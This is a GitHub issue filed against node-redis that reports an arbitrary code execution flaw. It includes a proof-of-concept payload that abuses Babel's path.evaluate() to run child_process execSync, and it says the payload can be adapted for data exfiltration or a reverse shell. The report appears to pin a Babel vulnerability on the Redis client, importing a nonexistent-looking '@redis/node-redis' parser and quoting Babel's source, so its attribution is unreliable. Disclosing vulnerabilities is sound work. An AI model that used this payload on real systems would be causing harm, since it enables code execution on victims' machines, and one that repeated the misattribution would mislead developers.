Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

arbitrary code execution when compiling specifically crafted malicious code #2755

Open
imhunterand opened this issue May 10, 2024 · 0 comments · May be fixed by #2756
Open

arbitrary code execution when compiling specifically crafted malicious code #2755

imhunterand opened this issue May 10, 2024 · 0 comments · May be fixed by #2756
Labels
Bug

Comments

@imhunterand
Copy link

imhunterand commented May 10, 2024
edited

Description

Affected by this project redis/node-redis is vulnerable to Incomplete List of Unallowed Inputs when using plugins that rely on internal Babel path.evaluate() or path.evaluateTruthy() methods.

Proof of Concept

const redis = require("redis");
const parser = require("@redis/node-redis");
const traverse = require("@babel/traverse").default;

const source = `String({  toString: Number.constructor("console.log(process.mainModule.require('child_process').execSync('id').toString())")});`;

const ast = parser.parse(source);

const evalVisitor = {
  Expression(path) {
    path.evaluate();
  },
};

traverse(ast, evalVisitor);

Of course, the payload can be adapted to do anything, such as exfiltrate data or spawn a reverse shell. The source code of babel-traverse/src/path/evaluation.ts prior to the fix is archived here

/**
 * Walk the input `node` and statically evaluate it.
 *
 * Returns an object in the form `{ confident, value, deopt }`. `confident`
 * indicates whether or not we had to drop out of evaluating the expression
 * because of hitting an unknown node that we couldn't confidently find the
 * value of, in which case `deopt` is the path of said node.
 *
 * Example:
 *
 *   t.evaluate(parse("5 + 5")) // { confident: true, value: 10 }
 *   t.evaluate(parse("!true")) // { confident: true, value: false }
 *   t.evaluate(parse("foo + foo")) // { confident: false, value: undefined, deopt: NodePath }
 *
 */

export function evaluate(this: NodePath): {
  confident: boolean;
  value: any;
  deopt?: NodePath;
} {
  const state: State = {
    confident: true,
    deoptPath: null,
    seen: new Map(),
  };
  let value = evaluateCached(this, state);
  if (!state.confident) value = undefined;

  return {
    confident: state.confident,
    deopt: state.deoptPath,
    value: value,
  };
}

CWE-184
CWE-697
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

PULL Request

#2756

Redis Server Version

4.6.13

Node Redis Version

No response

Platform

No response

Logs

No response
imhunterand added a commit to imhunterand/node-redis that referenced this issue May 10, 2024
@imhunterand
fix redis#2755 - code execution when compiling specifically crafted m…
2434a20 
…alicious code in multi/pipeline replies
@imhunterand imhunterand linked a pull request May 10, 2024 that will close this issue
Open
3 tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
Bug
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

fix #2755 - code execution when compiling specifically crafted malicious code imhunterand/node-redis
1 participant
@imhunterand